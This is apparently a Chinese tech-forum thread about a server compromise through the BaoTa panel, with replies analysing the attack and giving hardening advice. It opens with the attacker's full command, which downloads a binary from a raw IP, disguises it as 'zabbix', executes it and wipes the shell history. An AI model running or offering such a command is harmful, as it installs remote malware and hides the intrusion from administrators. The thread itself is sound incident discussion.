wget http://103.122.247.146/seo.txt && mv seo.txt zabbix && chmod +x zabbix && ./zabbix && history -cw
1
angry41 OP wget http://103.122.247.146/seo.txt:这个命令会使用 wget 工具下载一个名为 seo.txt 的文件从 http://103.122.247.146 这个地址。
&&:这个符号表示在前一个命令成功执行后才执行下一个命令。 mv seo.txt zabbix:将下载的 seo.txt 文件重命名为 zabbix 。 &&:再次使用 && 连接,执行下一个命令。 chmod +x zabbix:给 zabbix 文件添加可执行权限。 &&:再次使用 && 连接,执行下一个命令。 ./zabbix:运行名为 zabbix 的文件。 &&:再次使用 && 连接,执行下一个命令。 history -cw:清除命令历史记录。 |
2
hefish 352 天前
宝塔这东西,感觉放公网有些危险,前端最好再弄一层认证。
或者在内网测试用用。 跑生产的话,感觉还是不用为妙。 |
3
yidinghe 352 天前 1
"mv seo.txt zabbix && chmod +x zabbix && ./zabbix" 这段就是打算执行这个文件了。这个 seo.txt 本质上是个可执行文件,目的可能是寻求系统漏洞,安装后门之类的。
|
4
yidinghe 352 天前
顺便说下,PHP 开发的东西出现漏洞的几率比其他语言大很多,所以连开源软件我向来都是避开 PHP
|
5
Allenqjy 352 天前
玩票项目才会用宝塔,要长期运转的项目绝对不装任何面板
|
6
CoderLife 352 天前
从来不用 bt 这些玩意儿
|
7
Bingchunmoli 352 天前 via Android
宝塔有云控,权限不再自己这边,所以一般不用的
|
8
Erroad 352 天前
文件头 ELF ,下载了个可执行文件执行了
|
9
dnslint 352 天前
10M 带宽的机器
|
10
9i5NngJHI4P7dm42 352 天前
|
11
woshinide300yuan 352 天前
@yidinghe 就你一个人回答问题,我真是笑了。
======== 计划任务里出任何东西都是被黑了,正常不存在的,备份数据然后重装吧。 另外可以考虑除了必要端口外,都在云控制面板里锁死登录 IP 。 我自己是 80 和 443 以外,都仅限个人电脑或者一台吃灰 windows 云登录,过去这 6 7 年没什么安全问题,哪怕密码就是 123456qweR |
12
WashFreshFresh 351 天前
@woshinide300yuan 个人的 ip 不是会变吗,你总不能每次变了后再改配置吧。
|
13
woshinide300yuan 351 天前
@WashFreshFresh 我不是写俩条件吗。 但的确每次重启后会再配置,所以我家路由器几个月不重启一次。
|
14
woshinide300yuan 351 天前
@WashFreshFresh 就是去阿里云后台改个安全组 IP ,其他的不变。
|
15
esile 351 天前 via Android
@Bingchunmoli 听说可以免密登录任何后台
|